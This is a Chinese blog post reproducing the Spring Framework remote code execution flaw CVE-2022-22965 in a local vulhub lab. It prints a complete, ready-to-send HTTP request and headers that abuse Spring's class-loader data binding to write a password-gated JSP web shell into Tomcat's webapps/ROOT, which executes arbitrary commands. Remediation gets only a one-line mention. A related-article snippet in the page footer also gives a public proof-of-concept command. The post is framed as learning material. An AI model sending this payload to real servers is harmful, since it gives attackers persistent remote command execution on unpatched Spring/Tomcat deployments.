Spring Framwork(cve-2022-22965)

最新推荐文章于 2023-03-21 13:27:54 发布
最新推荐文章于 2023-03-21 13:27:54 发布
阅读量318 收藏
点赞数 1
分类专栏: CVE复现 文章标签: web安全 spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46539164/article/details/124469530
版权

前言
本次实验乃本地搭建测试,未在互联网测试,仅提供学习参考。
漏洞说明
Spring框架满爆出的RCE (远程命令执行)漏洞,编号是CVE-2022-22965。这个漏洞的主要原因是在JDK9+版本里,Spring MVc的数据绑定时出现的漏洞。
影响版本
spring Framework < 5.3.18
spring Framework <5.2.20
漏洞复现
环境搭建:由vulhub一键搭建,靶场地址:yourIP:Port
[upl-image-preview url=https://bbs.pwnthebox.com/assets/files/2022-04-23/1650711107-824047-image.png]

通过burp抓取数据包修改请求,加入payload。

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
除此之外,需添加以下字段,

suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Length: 2

[upl-image-preview url=https://bbs.pwnthebox.com/assets/files/2022-04-23/1650711146-772097-image.png]

成功之后,可进行远程命令执行

[upl-image-preview url=https://bbs.pwnthebox.com/assets/files/2022-04-23/1650711154-834934-image.png]

漏洞修复
WAF等安全组件防护
官方补丁信息

MCY5
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-22965Spring Framework)复现
kriesa的博客
07-13 956
CVE-2022-22965Spring Framework)复现
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
最新发布
10-27
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
Spring-Framework-5.2.x Maven版本
07-30
Spring-Framework-5.2.x源码maven版本,剔除了spring-aspects模块,下载后导入idea依赖完以后就可以愉快的调试spring源码了,转换不易谢谢
CVE-2022-22965Spring Framework远程代码执行漏洞
qq_50854662的博客
11-12 1589
CVE-2022-22965Spring Framework远程代码执行漏洞
spring-framework-5.1.20源码编译
qq_26634873的博客
07-12 104
github上找到5.1对应的版本 https://github.com/spring-projects/spring-framework/tree/5.1.x 查看README.md 找到 Build from Source 目录 源码编译 如果中间报错 Git 版本更新(Windows下) 直接打开git-bash.exe,输入git update-git-for-windows 然后重新编译,看到以下结果表示编译成功,大概需要半个小时左右 最后导入Idea 找到 Import into
Spring Framework RCE CVE-2022-22965漏洞学习
weixin_68320784的博客
04-09 1750
一、概述 3月底Spring Framework爆出严重级别的安全漏洞,该漏洞允许黑客进行任意命令执行。在3月31日Spring Framework官方发布了5.3.18以及5.2.20修复了该漏洞,随后该漏洞编号为CVE-2022-22965,这个漏洞也是先发布修复版本,后分配CVE编号的。从官网可知该漏洞存在的条件: 使用JDK9及以上版本 使用Apache Tomcat作为容器 使用了传统的WAR包部署方式 依赖了spring-wemvc以及springwebflux Spring Fra
CVE-2022-22965 GUItools单个图形化利用工具
04-06
影响组件:org.springframework:spring-beans 影响版本:和 的Spring框架均存在该漏洞,建议用户尽快进行排查处置。 缺陷分析 CVE-2010-1622中曾出现由于参数自动绑定机制导致的问题, 此前通过黑名单的方式修复...
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring Cloud Gateway 是基于 Spring FrameworkSpring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE...
CVE-2022-22947 SpringCloud GateWay SpEL RCE.doc
07-09
CVE-2022-22947 SpringCloud GateWay SpEL RCE CVE-2022-22947是一种影响SpringCloud GateWay的远程代码执行漏洞,通过SpEL(Spring Expression Language)实现RCE(Remote Code Execution)。下面是关于该漏洞的...
官方原版源码spring-framework-5.2.5.RELEASE.zip
03-26
官方原版源码spring-framework-5.2.5.RELEASE.zip
spring-framework-5.3.20
06-13
spring-framework-5.3.20
spring-framework-5.2.0.RELEASE-master.zip
10-19
spring ioc, spring aop 源码注释,源码解析,有需要学习spring源码的可以看看,里面有详细的方法注释,以及解析
spring-framework-5.0.5.RELEASE 漏洞修复
04-11
spring-messaging模块远程代码执行(CVE-2018-1270) STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它允许STOMP客户端与任意STOMP消息代理(Broker)进行交互。Spring框架中的...
Spring frameworkcve-2010-1622)漏洞利用指南1
08-08
Spring frameworkcve-2010-1622)漏洞利用指南1
CVE-2022-22965spring参数绑定漏洞
TengChuanB的博客
12-16 2144
cve-2022-22965
SpringFramework各个版本下载
health的博客
07-04 1165
SpringFramework各个版本下载:https://docs.spring.io/spring/docs/5.2.7.RELEASE/javadoc-api/
[Vulfocus解题]Spring Cloud Gateway 远程代码执行(CVE-2022-22947)
JY_Heart的博客
03-03 5818
漏洞复现: 1.打开靶场环境 2.抓包,修改get参数,提交get包 访问actuator API接口 3.访问env接口
spring5.2.20源码搭建报错问题
贤_龍的博客
03-21 505
spring源码搭建解决aspectj报错问题
CVE-2022-22965
09-21
CVE-2022-22965是一个存在于Spring框架中的漏洞。在JDK9之后引入的Module机制中,通过调用getModule方法,攻击者可以绕过之前通过黑名单修复的漏洞,从而导致远程代码执行。为了利用该漏洞,可以使用已经编写好的POC文件。您可以从https://github.com/BobTheShoplifter/Spring4Shell-POC/blob/0c557e85ba903c7ad6f50c0306f6c8271736c35e/poc.py下载该POC文件,并执行以下命令进行利用:python3 poc.py --url http://localhost:8080/CVE-2022-22965-0.0.1-SNAPSHOT/addUser。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值